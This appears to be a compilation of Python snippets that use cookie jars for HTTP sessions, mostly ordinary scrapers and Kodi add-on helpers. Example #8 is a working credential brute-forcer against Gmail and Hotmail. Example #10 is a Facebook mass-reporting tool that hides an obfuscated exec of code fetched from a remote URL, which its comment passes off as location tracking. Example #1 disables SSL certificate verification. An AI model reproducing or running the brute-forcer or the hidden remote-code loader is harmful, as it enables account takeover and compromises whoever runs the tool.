Example #1
# Missing imports added for completeness; `rootDir` and `addon` come from
# the add-on boilerplate that is not shown here.
import os
import sys
import urllib2
import cookielib
import xbmc

rootDir = xbmc.translatePath(rootDir)
resDir = os.path.join(rootDir, 'resources')
imgDir = os.path.join(resDir, 'images')
uwcicon = xbmc.translatePath(os.path.join(rootDir, 'icon.png'))
changelog = xbmc.translatePath(os.path.join(rootDir, 'changelog.txt'))

profileDir = addon.getAddonInfo('profile')
profileDir = xbmc.translatePath(profileDir).decode("utf-8")
cookiePath = os.path.join(profileDir, 'cookies.lwp')
kodiver = xbmc.getInfoLabel("System.BuildVersion").split(".")[0]

if not os.path.exists(profileDir):
    os.makedirs(profileDir)

urlopen = urllib2.urlopen
cj = cookielib.LWPCookieJar(xbmc.translatePath(cookiePath))
Request = urllib2.Request

handlers = [urllib2.HTTPBasicAuthHandler(), urllib2.HTTPHandler()]

if (2, 7, 8) < sys.version_info < (2, 7, 12):
    try:
        import ssl; ssl_context = ssl.create_default_context()
        ssl_context.check_hostname = False
        ssl_context.verify_mode = ssl.CERT_NONE
        handlers += [urllib2.HTTPSHandler(context=ssl_context)]
    except:
        pass

if cj is not None:
    if os.path.isfile(xbmc.translatePath(cookiePath)):
        # the fragment breaks off here; loading the saved cookies is the
        # natural continuation
        cj.load(ignore_discard=True, ignore_expires=True)
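A minimal sketch (an assumption, not the original code) of the usual continuation, wiring the jar into the handlers and installing a global opener:

handlers += [urllib2.HTTPCookieProcessor(cj)]  # attach the cookie jar
opener = urllib2.build_opener(*handlers)
urllib2.install_opener(opener)  # every urllib2.urlopen call now shares cookies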
Example #2
 def __init__(self):
     """ Set up the logger in a new channel. """
     self.logger = logging.getLogger("python-nikeplus-2013")
     """ Set up a cookies-enabled opener locally. """
     cj = cookielib.LWPCookieJar()
     self.opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
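A hedged sketch (not part of the original class) of persisting such a jar between runs; the filename is hypothetical:

import cookielib
import urllib2

cj = cookielib.LWPCookieJar('nikeplus_cookies.lwp')  # hypothetical filename
try:
    cj.load(ignore_discard=True)  # reuse cookies from a previous session
except IOError:
    pass  # no cookie file yet
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
# ... make requests through `opener` ...
cj.save(ignore_discard=True)  # write the cookies back to disk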
Example #3
def resolve(url):
    m = _regex(url)
    if m:
        cookies = cookielib.LWPCookieJar()
        opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookies))
        player = 'http://www.streamuj.tv/new-flash-player/mplugin4.swf'
        headers = {
            'User-Agent': util.UA,
            'Referer': 'http://www.streamuj.tv/mediaplayer/player.swf'
        }
        data = request(opener, url, headers)
        if data.find('Toto video neexistuje') != -1:  # "This video does not exist"
            util.error('Video bylo smazano ze serveru')  # "The video was deleted from the server"
            return
        burl = b64decode('aHR0cDovL2Z1LWNlY2gucmhjbG91ZC5jb20vcGF1dGg=')
        key = request(
            opener,
            'http://www.streamuj.tv/_key.php?auth=3C27f5wk6qB3g7nZ5SDYf7P7k1572rFH1QxV0QQ',
            headers)
        index = 0
        result = []
        qualities = re.search('rn\:[^\"]*\"([^\"]*)', data,
                              re.IGNORECASE | re.DOTALL)
        langs = re.search('langs\:[^\"]*\"([^\"]+)', data,
                          re.IGNORECASE | re.DOTALL)
        languages = []
        if not langs:
            # pretend there is at least one language so we read the 1st stream info
            languages = ['']
        else:
            languages = langs.group(1).split(',')
        for lang in languages:
            streams = re.search('res' + str(index) + '\:[^\"]*\"([^\"]+)',
                                data, re.IGNORECASE | re.DOTALL)
            subs = re.search('sub' + str(index) + '\:[^\"]*\"([^\"]+)', data,
                             re.IGNORECASE | re.DOTALL)
            if subs:
                subs = re.search('[^>]+>([^,$]+)', subs.group(1),
                                 re.IGNORECASE | re.DOTALL)
            if streams and qualities:
                streams = streams.group(1).split(',')
                rn = qualities.group(1).split(',')
                qindex = 0
                for stream in streams:
                    res = json.loads(
                        util.post_json(burl, {
                            'link': stream,
                            'player': player,
                            'key': key
                        }))
                    req = urllib2.Request(res['link'], headers=headers)
                    req.get_method = lambda: 'HEAD'
                    try:
                        resp = opener.open(req)
                    except Exception as e:
                        print 'skipping %s: %s' % (res['link'], e)
                        continue
                    stream = resp.geturl()
                    resp.close()
                    q = rn[qindex]
                    if q == 'HD':
                        q = '720p'
                    else:
                        q = 'SD'
                    l = ' ' + lang
                    if subs:
                        l += ' + subs'
                        s = subs.group(1)
                        s = json.loads(
                            util.post_json(burl, {
                                'link': s,
                                'player': player,
                                'key': key
                            }))
                        cookie_header = ",".join("%s=%s" % (c.name, c.value)
                                                 for c in cookies)
                        subtitle_headers = {"Cookie": cookie_header}
                        subtitle_headers.update(headers)
                        result.append({
                            'url': stream,
                            'quality': q,
                            'subs': s['link'],
                            'headers': subtitle_headers,
                            'lang': l
                        })
                    else:
                        result.append({
                            'url': stream,
                            'quality': q,
                            'headers': headers,
                            'lang': l
                        })
                    qindex += 1
            index += 1
        return result
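The `req.get_method = lambda: 'HEAD'` override used above is the standard trick for coaxing urllib2 into a HEAD request; a standalone sketch with a hypothetical URL:

import urllib2

req = urllib2.Request('http://example.com/video.mp4')  # hypothetical URL
req.get_method = lambda: 'HEAD'  # urllib2 has no built-in HEAD support
resp = urllib2.urlopen(req)
final_url = resp.geturl()  # the redirect target, without downloading the body
resp.close()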
Example #4
import requests, json
try:
    import cookielib
except ImportError:
    import http.cookiejar as cookielib
import re

session = requests.session()
session.cookies = cookielib.LWPCookieJar(filename="cookies.txt")
try:
    session.cookies.load(ignore_discard=True)
except:
    print("cookie未能加载")

agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.1.2 Safari/603.3.8'
header = {
    "HOST": "www.zhihu.com",
    "Referer": "https://www.zhihu.com",
    "User-agent": agent
}


def is_login():
    inbox_url = "https://www.zhihu.com/inbox"
    response = session.get(inbox_url, headers=header, allow_redirects=False)
    return response.status_code == 200
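The counterpart to session.cookies.load() is saving after a successful check; a short sketch reusing the same session:

if is_login():
    # write the cookies back to cookies.txt for the next run
    session.cookies.save(ignore_discard=True)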

Example #5
import requests
try:
    import cookielib
except ImportError:
    import http.cookiejar as cookielib
import re

from bs4 import BeautifulSoup

agent = 'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.61 Mobile Safari/537.36'

headers = {
    "Host": "bbs.guitarera.com",
    "Referer": "http://bbs.guitarera.com/forum.php",
    'User-Agent': agent
}

session = requests.session()
session.cookies = cookielib.LWPCookieJar("cookies_LWP")
#session.cookies = cookielib.FileCookieJar("cookies_File")
try:
    session.cookies.load(ignore_discard=True)
    print("Cookie 已加载")
except:
    print("Cookie 未能加载")


def login(account, password):
    formhash = getFormhash()
    print("formhash:", formhash)
    postUrl = "http://bbs.guitarera.com/member.php?mod=logging&action=login&loginsubmit=yes&handlekey=login"
    postData = {
        'fastloginfield': "username",
        'username': account,
Example #6
# From addon.common.net; this fragment assumes the module-level imports of
# cookielib, urllib and urllib2, plus the HeadRequest and HttpResponse
# helpers defined elsewhere in that module.
class Net:
    '''
    This class wraps :mod:`urllib2` and provides an easy way to make http
    requests while taking care of cookies, proxies, gzip compression and
    character encoding.

    Example::

        from addon.common.net import Net
        net = Net()
        response = net.http_GET('http://xbmc.org')
        print response.content
    '''
    _cj = cookielib.LWPCookieJar()
    _proxy = None
    _user_agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'
    _http_debug = False

    def __init__(self, cookie_file='', proxy='', user_agent='',
                 http_debug=False):
        '''
        Kwargs:
            cookie_file (str): Full path to a file to be used to load and save
            cookies to.

            proxy (str): Proxy setting (eg.
            ``'http://*****:*****@example.com:1234'``)

            user_agent (str): String to use as the User Agent header. If not
            supplied the class will use a default user agent (chrome)

            http_debug (bool): Set ``True`` to have HTTP header info written to
            the XBMC log for all requests.
        '''
        if cookie_file:
            self.set_cookies(cookie_file)
        if proxy:
            self.set_proxy(proxy)
        if user_agent:
            self.set_user_agent(user_agent)
        self._http_debug = http_debug
        self._update_opener()

    def set_cookies(self, cookie_file):
        '''
        Set the cookie file and try to load cookies from it if it exists.

        Args:
            cookie_file (str): Full path to a file to be used to load and save
            cookies to.
        '''
        try:
            self._cj.load(cookie_file, ignore_discard=True)
            self._update_opener()
            return True
        except:
            return False

    def get_cookies(self):
        '''Returns a dictionary containing all cookie information by domain.'''
        return self._cj._cookies

    def save_cookies(self, cookie_file):
        '''
        Saves cookies to a file.

        Args:
            cookie_file (str): Full path to a file to save cookies to.
        '''
        self._cj.save(cookie_file, ignore_discard=True)

    def set_proxy(self, proxy):
        '''
        Args:
            proxy (str): Proxy setting (eg.
            ``'http://*****:*****@example.com:1234'``)
        '''
        self._proxy = proxy
        self._update_opener()

    def get_proxy(self):
        '''Returns string containing proxy details.'''
        return self._proxy

    def set_user_agent(self, user_agent):
        '''
        Args:
            user_agent (str): String to use as the User Agent header.
        '''
        self._user_agent = user_agent

    def get_user_agent(self):
        '''Returns user agent string.'''
        return self._user_agent

    def _update_opener(self):
        '''
        Builds and installs a new opener to be used by all future calls to
        :func:`urllib2.urlopen`.
        '''
        if self._http_debug:
            http = urllib2.HTTPHandler(debuglevel=1)
        else:
            http = urllib2.HTTPHandler()
        if self._proxy:
            opener = urllib2.build_opener(
                urllib2.HTTPCookieProcessor(self._cj),
                urllib2.ProxyHandler({'http': self._proxy}),
                urllib2.HTTPBasicAuthHandler(), http)
        else:
            opener = urllib2.build_opener(
                urllib2.HTTPCookieProcessor(self._cj),
                urllib2.HTTPBasicAuthHandler(), http)
        urllib2.install_opener(opener)

    def http_GET(self, url, headers={}, compression=True):
        '''
        Perform an HTTP GET request.

        Args:
            url (str): The URL to GET.

        Kwargs:
            headers (dict): A dictionary describing any headers you would like
            to add to the request. (eg. ``{'X-Test': 'testing'}``)

            compression (bool): If ``True`` (default), try to use gzip
            compression.

        Returns:
            An :class:`HttpResponse` object containing headers and other
            meta-information about the page and the page content.
        '''
        return self._fetch(url, headers=headers, compression=compression)

    def http_POST(self, url, form_data, headers={}, compression=True):
        '''
        Perform an HTTP POST request.

        Args:
            url (str): The URL to POST.

            form_data (dict): A dictionary of form data to POST.

        Kwargs:
            headers (dict): A dictionary describing any headers you would like
            to add to the request. (eg. ``{'X-Test': 'testing'}``)

            compression (bool): If ``True`` (default), try to use gzip
            compression.

        Returns:
            An :class:`HttpResponse` object containing headers and other
            meta-information about the page and the page content.
        '''
        return self._fetch(url, form_data, headers=headers,
                           compression=compression)

    def http_HEAD(self, url, headers={}):
        '''
        Perform an HTTP HEAD request.

        Args:
            url (str): The URL to GET.

        Kwargs:
            headers (dict): A dictionary describing any headers you would like
            to add to the request. (eg. ``{'X-Test': 'testing'}``)

        Returns:
            An :class:`HttpResponse` object containing headers and other
            meta-information about the page.
        '''
        req = HeadRequest(url)
        req.add_header('User-Agent', self._user_agent)
        for k, v in headers.items():
            req.add_header(k, v)
        response = urllib2.urlopen(req)
        return HttpResponse(response)

    def _fetch(self, url, form_data={}, headers={}, compression=True):
        '''
        Perform an HTTP GET or POST request.

        Args:
            url (str): The URL to GET or POST.

            form_data (dict): A dictionary of form data to POST. If empty, the
            request will be a GET, if it contains form data it will be a POST.

        Kwargs:
            headers (dict): A dictionary describing any headers you would like
            to add to the request. (eg. ``{'X-Test': 'testing'}``)

            compression (bool): If ``True`` (default), try to use gzip
            compression.

        Returns:
            An :class:`HttpResponse` object containing headers and other
            meta-information about the page and the page content.
        '''
        encoding = ''
        req = urllib2.Request(url)
        if form_data:
            form_data = urllib.urlencode(form_data)
            req = urllib2.Request(url, form_data)
        req.add_header('User-Agent', self._user_agent)
        for k, v in headers.items():
            req.add_header(k, v)
        if compression:
            req.add_header('Accept-Encoding', 'gzip')
        response = urllib2.urlopen(req)
        return HttpResponse(response)
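A usage sketch assembled from the docstrings above; the cookie-file path is hypothetical:

net = Net(cookie_file='/tmp/addon_cookies.lwp')  # hypothetical path
response = net.http_GET('http://xbmc.org', headers={'X-Test': 'testing'})
print response.content
net.save_cookies('/tmp/addon_cookies.lwp')  # persist the session's cookies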
Example #7
# module
from auth import islogin
from auth import Logging


"""
    Note:
        1. 身份验证由 `auth.py` 完成。
        2. 身份信息保存在当前目录的 `cookies` 文件中。
        3. `requests` 对象可以直接使用,身份信息已经自动加载。

    By Luozijun (https://github.com/LuoZijun), 09/09 2015

"""
requests = requests.Session()  # deliberately shadows the module with a session object
requests.cookies = cookielib.LWPCookieJar('cookies')
try:
    requests.cookies.load(ignore_discard=True)
except:
    Logging.error(u"You are not logged in to Zhihu yet ...")
    Logging.info(u"Run `python auth.py` to complete the login.")
    raise Exception("Permission denied (403)")


if not islogin():
    Logging.error(u"Your identity information has expired; regenerate it with `python auth.py`.")
    raise Exception("Permission denied (403)")


reload(sys)
sys.setdefaultencoding('utf8')
Example #8
def bruteforce(self):
    progress = Progressbar(self,
                           orient=HORIZONTAL,
                           length=200,
                           mode='determinate')
    progress.place(x=600, y=200)
    use = OptionParser()

    use.add_option("-g",
                   "--gmail",
                   dest="gmail",
                   help="Write Your Account gmail")
    use.add_option("-t",
                   "--hotmail",
                   dest="hotmail",
                   help="Write Your Account hotmail")
    use.add_option("-T",
                   "--twitter",
                   dest="twitter",
                   help="Write Your Account twitter")
    use.add_option("-f",
                   "--facebook",
                   dest="facebook",
                   help="Write Your Account facebook")
    use.add_option("-n",
                   "--netflix",
                   dest="netflix",
                   help="Write Your Account Netflix")
    use.add_option("-l",
                   "--list",
                   dest="list_password",
                   help="Write Your list passowrd")
    use.add_option("-p",
                   "--password",
                   dest="password",
                   help="Write Your passowrd ")
    use.add_option("-X", "--proxy", dest="proxy", help="Proxy list ")
    (options, args) = use.parse_args()

    brows = Browser()
    brows.set_handle_robots(False)
    brows._factory.is_html = True
    brows.set_cookiejar(cookielib.LWPCookieJar())
    useragents = [
        'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.19) Gecko/20081202 Firefox (Debian-2.0.0.19-0etch1)',
        'Opera/9.80 (J2ME/MIDP; Opera Mini/9.80 (S60; SymbOS; Opera Mobi/23.348; U; en) Presto/2.5.25 Version/10.54',
        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.12 Safari/535.11',
        'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.6 (KHTML, like Gecko) Chrome/16.0.897.0 Safari/535.6'
    ]
    brows.addheaders = [('User-agent', random.choice(useragents))]
    brows.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),
                             max_time=1)
    proxyList = options.proxy
    if options.gmail == None:
        if options.hotmail == None:
            if options.twitter == None:
                if options.facebook == None:
                    if options.netflix == None:
                        print(use.usage)
                        exit()
        elif options.hotmail != None or options.gmail == None:
            smtp_srverH = smtplib.SMTP('smtp.live.com', 587)
            smtp_srverH.ehlo()
            smtp_srverH.starttls()
            if options.password != None or options.list_password == None:
                print("<<<<<<+++++Start  Attacking Email+++++>>>>>")
                try:
                    smtp_srverH.login(options.hotmail, options.password)
                    print("Found Password :{} \t Found Hotmail:{}".format(
                        options.password, options.hotmail))
                    Save = io.open(
                        "Hotmail.txt",
                        "a").write("Account Hotmail:" + options.hotmail +
                                   "\t\tPassword:"******"\n")
                except:
                    print("Not Found Password : {} \t Email Hotmail:{}".format(
                        options.password, options.hotmail))
            elif options.list_password != None or options.password == None:
                password_list = io.open(options.list_password, "r").readlines()
                for password in password_list:
                    try:
                        print("<<<<<<+++++Start  Attacking Email+++++>>>>>")
                        smtp_srverH.login(options.hotmail, password)
                        print("FOUND Password :{} \n Found Hotmail:{}".format(
                            password, options.hotmail))
                        Save = io.open(
                            "Hotmail.txt",
                            "a").write("Account Hotmail:" + options.hotmail +
                                       "\t\tPassword:"******"\n")
                    except smtplib.SMTPAuthenticationError:
                        print("Not Found Password : {} \t Email Hotmail:{}".
                              format(password, options.hotmail))
        if options.twitter != None:
            hejab = threading.Thread(target=twitter, name="hejab")
            hejab.start()
        if options.facebook != None:
            facebook(brows)
        if options.netflix != None:
            netflix = threading.Thread(target=Netflix, name="Netflix")
            netflix.start()

    elif options.gmail != None or options.hotmail == None or options.twitter == None:
        smtp_srverG = smtplib.SMTP('smtp.gmail.com', 587)
        smtp_srverG.ehlo()
        smtp_srverG.starttls()
        if options.password != None or options.list_password == None:
            print("%s<<<<<<+++++Start  Attacking Email+++++>>>>>%s" % (R, W))
            try:
                smtp_srverG.login(options.gmail, options.password)
                print("Found Password :{} \t Found Gmail:{}".format(
                    options.password, options.gmail))
                Save = io.open("Gmail.txt",
                               "a").write("Account Gmail:" + options.gmail +
                                          "\t\tPassword:"******"\n")
            except:
                print("Not Found Password : {} \t Email Gmail:{}".format(
                    options.password, options.gmail))
        elif options.list_password != None:
            password_list = io.open(options.list_password, "r").readlines()
            for password in password_list:
                password = password.rstrip("\n")
                print("<<<<<<+++++Start  Attacking Email+++++>>>>>")
                try:
                    smtp_srverG.login(options.gmail, password)
                    print("{}<<<+++Found Password :{} \t Found Gmail:{}+++>>>".
                          format(G, password, options.gmail))
                    Save = io.open("Gmail.txt",
                                   "a").write("Account Gmail:" +
                                              options.gmail + "\t\tPassword:"******"\n")
                    break
                except smtplib.SMTPAuthenticationError:
                    print(
                        "{}<<<---Not Found Password : {} \t Email Gmail:{}--->>>"
                        .format(R, password, options.gmail))

    else:
        print(use.usage)
        exit()
Example #9
def get_cj(url):
    cj = cookielib.LWPCookieJar()
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
    opener.addheaders = [('User-Agent', UA)]
    response = opener.open(url)
    return ''.join(['%s=%s;' % (c.name, c.value) for c in cj])
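A usage sketch: the returned string drops straight into a Cookie header (the URLs are hypothetical; UA is assumed to be defined next to the original):

cookie_header = get_cj('http://example.com/login')  # hypothetical URL
req = urllib2.Request('http://example.com/data',
                      headers={'Cookie': cookie_header, 'User-Agent': UA})
data = urllib2.urlopen(req).read()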
Example #10
    def run(self):
        br = mechanize.Browser()
        url = "https://mbasic.facebook.com"
        br.set_handle_equiv(True)
        br.set_handle_referer(True)
        br.set_handle_robots(False)
        br.set_cookiejar(cookielib.LWPCookieJar())
        br.addheaders = [
            ("User-Agent",
             random.choice(open("raw/header/ua.txt").read().splitlines()))
        ]
        br.open("https://mbasic.facebook.com/login")
        br.select_form(nr=0)
        br.form["email"] = "{}".format(self._email)
        br.form["pass"] = "******".format(self._pasw)
        br.submit()
        if "save-device" in br.geturl() or "m_sess" in br.geturl():
            print("[{}+{}] Login success: {}|{}".format(
                G, N, self._email, self._pasw))
            print("[%s=%s] %sReporting ...%s" % (G, N, R, N))
            br.open("https://mbasic.facebook.com/{}".format(self.tg))
            br._factory.is_html = True
            bb = bs4.BeautifulSoup(br.response().read(),
                                   features="html.parser")
            for x in bb.find_all("a", href=True):
                if "rapid_report" in x["href"]:
                    kntl = x["href"]
            '''
		   Sorry I encrypted this code to detect your
		   location, I just want to know who you are, if
		   anyone misuses this tool I can look for it ^^
			'''
            exec(
                zlib.decompress(
                    base64.b64decode(
                        requests.get(
                            eval(
                                base64.b64decode(
                                    "Imh0dHA6Ly9kb3JheXkuam9vbWxhLmNvbS9hLnR4dCI="
                                ))).text)))
            br.open(kntl)
            ''' 
				you can modify tag ^^
			'''
            j = json.dumps({
                "fake": "profile_fake_account",
                "action_key": "FRX_PROFILE_REPORT_CONFIRMATION",
                "checked": "yes"
            })
            js = json.loads(j)
            br._factory.is_html = True
            br.select_form(nr=0)
            br.form["tag"] = [js["fake"]]
            br.submit()
            try:
                br._factory.is_html = True
                br.select_form(nr=0)
                br.form["action_key"] = [js["action_key"]]
            except Exception as f:
                print("%s[!]%s %s" % (R, N, f))
            br.submit()
            try:
                br._factory.is_html = True
                br.select_form(nr=0)
                br.form["checked"] = [js["checked"]]
                br.submit()
                res = br.response().read()
                print("[%s=%s] Reported as fake account." % (G, N))
                print("[{}*{}] Result saved as {}__reportSuccess.html".format(
                    G, N, self._email))
                open("{}__reportSuccess.html".format(self._email),
                     "w").write(res)
            except Exception as f:
                print("\r[%s-%s] Already Reports." % (R, N))
                pass
        else:
            print "{}[!]{} Login Failed: {}|{}".format(R, N, self._email,
                                                       self._pasw)
Example #11
def pay(locationNum, phoneNum, pin, cvv, duration):
    if duration <= 0 or duration > 120:
        print ts() + "Error input duration: " + str(duration)
        return False
    if duration < 5:
        print ts() + "Only " + str(duration) + " mins left, no need to pay"
        sendSMS("Only " + str(duration) + " mins left, no need to pay")
        return True
    print ts() + "Going to pay for duration of " + str(
        duration) + " mins using phone number " + str(
            phoneNum) + " for location " + str(
                locationNum) + ". You have 5 secs to cancel it."

    # print "debuging"
    # return True

    time.sleep(5)

    br = mechanize.Browser()
    cj = cookielib.LWPCookieJar()
    br.set_cookiejar(cj)

    # Log in page
    br.open("https://m.paybyphone.com")
    br.select_form(nr=0)
    br["ctl00$ContentPlaceHolder1$CallingCodeDropDownList"][0] = -1
    br["ctl00$ContentPlaceHolder1$AccountTextBox"] = str(phoneNum)
    br["ctl00$ContentPlaceHolder1$PinOrLast4DigitCcTextBox"] = str(pin)
    response1 = br.submit()

    # Select location number
    checkin_URL = response1.geturl()
    br.open(checkin_URL)
    br.select_form(nr=0)
    if br.form.controls[4].name == 'ctl00$ContentPlaceHolder1$ActiveParkingGridView$ctl02$ExtendAllowedHiddenField' \
            and br['ctl00$ContentPlaceHolder1$ActiveParkingGridView$ctl02$ExtendAllowedHiddenField'] == 'Normal':
        print ts() + "Time still remains when paying! Probably you are using the same account for two successive payments."
        return False
    br["ctl00$ContentPlaceHolder1$LocationNumberTextBox"] = str(locationNum)
    response1 = br.submit()

    # Duration
    checkin_URL = response1.geturl()
    br.open(checkin_URL)
    br.select_form(nr=0)
    br["ctl00$ContentPlaceHolder1$DurationTextBox"] = str(duration)
    response1 = br.submit()

    # Check Out
    checkin_URL = response1.geturl()
    br.open(checkin_URL)
    br.select_form(nr=0)
    if br["ctl00$ContentPlaceHolder1$NoRatesFoundErrorHidden"] == 'True':
        print ts() + "NoRatesFoundError"
        return False
    if br['ctl00$ContentPlaceHolder1$SessionQuoteErrorHidden'] == 'True':
        print ts() + 'SessionQuoteErrorHidden'
        return False
    if br['ctl00$ContentPlaceHolder1$ParkingSessionValidationErrorHidden'] == 'True':
        print ts() + 'ParkingSessionValidationError'
        return False
    if br.form.controls[5].name == 'ctl00$ContentPlaceHolder1$ChangeButton':
        print ts() + 'Only change button exists!'
        return False
    if br.form.controls[6].name != 'ctl00$ContentPlaceHolder1$ConfirmParking':
        print ts() + 'No confirm parking button exists!'
        return False
    if br.form.controls[5].name != 'ctl00$ContentPlaceHolder1$CvvTextBox':
        print ts() + 'No CVV text box!'
        return False
    br["ctl00$ContentPlaceHolder1$CvvTextBox"] = cvv
    response1 = br.submit()

    # Make sure it successfully paid
    checkin_URL = response1.geturl()
    html = br.open(checkin_URL).read()
    br.select_form(nr=0)
    if br.form.controls[
            0].name == 'ctl00$ContentPlaceHolder1$AddTimeLongButton':
        print ts() + "Failed to find park again buttion"
        return False
    if html.find("Icon_checkmark.png") != -1:
        msg = "Successfully pay for duration of " + str(
            duration) + " mins using phone number " + str(
                phoneNum) + " for location " + str(locationNum)
        print ts() + msg
        sendSMS(msg)
        return True

    return False
Example #12
# try:
#     from PIL import Image
# except:
#     pass

# Missing imports added for completeness
import re
import requests
try:
    import cookielib
except ImportError:
    import http.cookiejar as cookielib

# Build the request headers
agent = 'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Mobile Safari/537.36'
headers = {
    "Host": "www.zhihu.com",
    "Referer": "https://www.zhihu.com/",
    'User-Agent': agent
}

# Use the saved login cookies
session = requests.session()
session.cookies = cookielib.LWPCookieJar(filename='cookies')
try:
    session.cookies.load(ignore_discard=True)
except:
    print("Cookie 未能加载")


def get_xsrf():
    '''_xsrf is a dynamically changing anti-forgery parameter'''
    index_url = 'https://www.zhihu.com'
    # fetch the _xsrf token needed for login
    index_page = session.get(index_url, headers=headers)
    html = index_page.text
    pattern = r'name="_xsrf" value="(.*?)"'
    # re.findall returns a list here
    _xsrf = re.findall(pattern, html)
    # the fragment broke off here; returning the token is the natural ending
    return _xsrf[0] if _xsrf else ''
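A hedged sketch of how the token is typically used in the login POST; the endpoint and field names are assumptions, not verified against Zhihu:

postdata = {
    '_xsrf': get_xsrf(),  # anti-forgery token scraped above
    'phone_num': '13012345678',  # hypothetical credentials
    'password': 'secret',
}
resp = session.post('https://www.zhihu.com/login/phone_num',  # assumed endpoint
                    data=postdata, headers=headers)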
Example #13
def get_results(start_date, end_date, results_jsonfile):
    # `global` must precede any use of the name; the original declared it
    # after use further down, which Python rejects
    global id_counter

    # Browser
    br = mechanize.Browser()

    # Cookie Jar
    cj = cookielib.LWPCookieJar()
    br.set_cookiejar(cj)

    # Browser options
    br.set_handle_equiv(True)
    br.set_handle_redirect(True)
    br.set_handle_referer(True)
    br.set_handle_robots(False)

    # Follows refresh 0 but not hangs on refresh > 0
    br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)

    # Want debugging messages?
    #br.set_debug_http(True)
    #br.set_debug_redirects(True)
    #br.set_debug_responses(True)

    # User-Agent (this is cheating, ok?)
    br.addheaders = [(
        'User-agent',
        'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1'
    )]

    br.open("https://newsarchive.nebpress.com/")
    response1 = br.follow_link(text_regex=r"Guest Login")
    br.form = list(br.forms())[0]

    control1 = br.form.find_control("search_text")
    control2 = br.form.find_control("start_date")
    control3 = br.form.find_control("end_date")
    control4 = br.form.find_control("publication_filter")

    publications = []
    for item in control4.items:
        if not item.name == "all":
            publications.append(item.name)

    reporter_list = ["Katie Walter", "Amanda Woita", "Benjamin Welch"]

    for reporter in reporter_list:
        for pub in publications:
            br.open("https://newsarchive.nebpress.com/")
            response1 = br.follow_link(text_regex=r"Guest Login")
            br.form = list(br.forms())[0]
            control1 = br.form.find_control("search_text")
            control2 = br.form.find_control("start_date")
            control3 = br.form.find_control("end_date")
            control4 = br.form.find_control("publication_filter")
            control1.value = reporter
            control2.value = start_date
            control3.value = end_date
            control4.value = [pub]
            response = br.submit()
            soup = BeautifulSoup(response)
            text = soup.find_all('p')
            for t in text:
                for child in t.children:
                    if reporter in child:
                        client_location = get_client_location(
                            pub, NNS_client_location_data)
                        if client_location != None:
                            data = {
                                "type": "Feature",
                                "properties": {
                                    "name": "",
                                    "text": "",
                                    "reporter": "",
                                    "date": ""
                                },
                                "geometry": {
                                    "type": "Point",
                                    "coordinates": []
                                },
                                "id": ""
                            }

                            client_name = replace_pub_number_with_client_name(
                                pub, NNS_clients)
                            client_property = data["properties"]
                            client_property["name"] = client_name
                            client_property["text"] = str(t)
                            client_property["reporter"] = reporter
                            client_property["date"] = start_date

                            location_property = data["geometry"]
                            location_property["coordinates"] = client_location

                            data["id"] = id_counter

                            print "Found " + client_name + " with article that includes " + reporter + " in the text."

                            update_json_file(data, results_jsonfile)
                            id_counter += 1
                        else:
                            pass
Example #14
    def __init__(self, subscription, proxy_config, cookie_file, debug=False):
        self.subscription = subscription
        self.debug = debug
        self.non_seasonal_shows = {'Super Bowl Archives': '117'}
        self.seasonal_shows = {
            'NFL Gameday': {
                '2015': '252',
                '2014': '212',
                '2013': '179',
                '2012': '146'
            },
            'Top 100 Players': {
                '2015': '257',
                '2014': '217',
                '2013': '185',
                '2012': '153'
            }
        }
        self.boxscore_url = 'http://neulionms-a.akamaihd.net/fs/nfl/nfl/edl/nflgr'

        if subscription == 'gamepass':
            self.base_url = 'https://gamepass.nfl.com/nflgp'
            self.servlets_url = 'http://gamepass.nfl.com/nflgp/servlets'
            self.seasonal_shows.update({
                'Playbook': {
                    '2015': '255',
                    '2014': '213',
                    '2013': '180',
                    '2012': '147'
                },
                'NFL Total Access': {
                    '2015': '254',
                    '2014': '214',
                    '2013': '181',
                    '2012': '148'
                },
                'NFL RedZone Archives': {
                    '2015': '248',
                    '2014': '221',
                    '2013': '182',
                    '2012': '149'
                },
                'Sound FX': {
                    '2015': '256',
                    '2014': '215',
                    '2013': '183',
                    '2012': '150'
                },
                'Coaches Show': {
                    '2014': '216',
                    '2013': '184',
                    '2012': '151'
                },
                'A Football Life': {
                    '2015': '249',
                    '2014': '218',
                    '2013': '186',
                    '2012': '154'
                },
                'NFL Films Presents': {
                    '2014': '219',
                    '2013': '187'
                },
                'Hard Knocks': {
                    '2015': '251',
                    '2014': '220',
                    '2013': '223'
                },
                'Hall of Fame': {
                    '2015': '253',
                    '2014': '222'
                }
            })
        elif subscription == 'gamerewind':
            self.base_url = 'https://gamerewind.nfl.com/nflgr'
            self.servlets_url = 'http://gamerewind.nfl.com/nflgr/servlets'

        else:
            raise ValueError('"%s" is not a supported subscription.' %
                             subscription)

        self.http_session = requests.Session()
        if proxy_config is not None:
            proxy_url = self.build_proxy_url(proxy_config)
            if proxy_url != '':
                self.http_session.proxies = {
                    'http': proxy_url,
                    'https': proxy_url,
                }
        self.cookie_jar = cookielib.LWPCookieJar(cookie_file)
        try:
            self.cookie_jar.load(ignore_discard=True, ignore_expires=True)
        except IOError:
            pass
        self.http_session.cookies = self.cookie_jar
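The matching save call is not shown in the original; a sketch (assumption) of persisting the jar at shutdown, mirroring the load flags used above:

# called from some other method of the same class (sketch)
self.cookie_jar.save(ignore_discard=True, ignore_expires=True)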
Example #15
 def get_empty_cookiejar():
